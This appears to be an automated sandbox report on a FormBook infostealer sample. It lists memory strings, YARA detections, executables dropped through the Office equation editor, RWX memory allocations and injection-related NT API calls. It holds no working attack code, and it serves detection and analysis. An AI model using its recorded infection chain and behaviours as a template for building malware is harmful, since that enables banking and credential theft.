          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: vbc.exe, vbc.exe, 00000005.00000002.2159504550.0000000000A62000.00000020.00020000.sdmp, vbc.exe, 00000006.00000000.2161211569.0000000000A62000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2163492264.0000000000A62000.00000020.00020000.sdmpString found in binary or memory: http://www.churchsw.org/church-projector-project
          Source: vbc.exe, vbc.exe, 00000005.00000002.2159504550.0000000000A62000.00000020.00020000.sdmp, vbc.exe, 00000006.00000000.2161211569.0000000000A62000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2163492264.0000000000A62000.00000020.00020000.sdmpString found in binary or memory: http://www.churchsw.org/repository/Bibles/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2183655398.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2183655398.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2188989063.000000000842E000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000008.00000000.2188989063.000000000842E000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: C:\Users\Public\vbc.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004181B0 NtCreateFile,7_2_004181B0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00418260 NtReadFile,7_2_00418260
          Source: C:\Users\Public\vbc.exeCode function: 7_2_004182E0 NtClose,7_2_004182E0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00418390 NtAllocateVirtualMemory,7_2_00418390
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00418392 NtAllocateVirtualMemory,7_2_00418392
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B300C4 NtCreateFile,LdrInitializeThunk,7_2_00B300C4
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B30078 NtResumeThread,LdrInitializeThunk,7_2_00B30078
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B30048 NtProtectVirtualMemory,LdrInitializeThunk,7_2_00B30048
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B307AC NtCreateMutant,LdrInitializeThunk,7_2_00B307AC
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2F9F0 NtClose,LdrInitializeThunk,7_2_00B2F9F0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2F900 NtReadFile,LdrInitializeThunk,7_2_00B2F900
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_00B2FAE8
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_00B2FAD0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_00B2FBB8
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_00B2FB68
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FC90 NtUnmapViewOfSection,LdrInitializeThunk,7_2_00B2FC90
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FC60 NtMapViewOfSection,LdrInitializeThunk,7_2_00B2FC60
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FD8C NtDelayExecution,LdrInitializeThunk,7_2_00B2FD8C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_00B2FDC0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FEA0 NtReadVirtualMemory,LdrInitializeThunk,7_2_00B2FEA0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_00B2FED0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FFB4 NtCreateSection,LdrInitializeThunk,7_2_00B2FFB4
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B310D0 NtOpenProcessToken,7_2_00B310D0
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B30060 NtQuerySection,7_2_00B30060
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B301D4 NtSetValueKey,7_2_00B301D4
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B3010C NtOpenDirectoryObject,7_2_00B3010C
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B31148 NtOpenThread,7_2_00B31148
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2F8CC NtWaitForSingleObject,7_2_00B2F8CC
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B31930 NtSetContextThread,7_2_00B31930
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2F938 NtWriteFile,7_2_00B2F938
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FAB8 NtQueryValueKey,7_2_00B2FAB8
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FA20 NtQueryInformationFile,7_2_00B2FA20
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FA50 NtEnumerateValueKey,7_2_00B2FA50
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FBE8 NtQueryVirtualMemory,7_2_00B2FBE8
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FB50 NtCreateKey,7_2_00B2FB50
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B2FC30 NtOpenProcess,7_2_00B2FC30
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00B30C40 NtGetContextThread,7_2_00B30C40
